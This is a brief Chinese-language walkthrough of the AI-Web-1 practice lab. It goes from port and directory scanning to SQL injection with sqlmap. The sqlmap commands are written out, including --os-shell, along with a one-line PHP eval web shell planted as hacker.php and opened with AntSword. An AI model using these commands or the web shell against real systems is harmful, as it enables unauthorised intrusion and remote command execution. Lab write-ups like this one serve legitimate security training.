1.探测ip及端口
2.扫目录
3. 看看这几个目录有啥
4.看看这个爬虫文件里的 发现都被禁止
5. uploads没权限的话那试试se3reTdir777/ 发现可以 然后试着submit一下
6.看到这我感觉像sql注入 拿sqlmap跑一下吧 先抓个包
7.post型的 把数据包放1.txt里 使用 python3 sqlmap.py -r 1.txt --current-db --batch
8.python3 sqlmap.py -r 1.txt -D aiweb1 --tables --batch
9.看看aiweb1pwn密码
然后算了 试试user
10.上面没啥成果 得提权
python3 sqlmap.py -r 1.txt --os-shell
然后看看这个info.php
echo "<php @eval(/$_POST['cmd']);?>" > hacker.php
出现这种情况就是好了
蚁剑连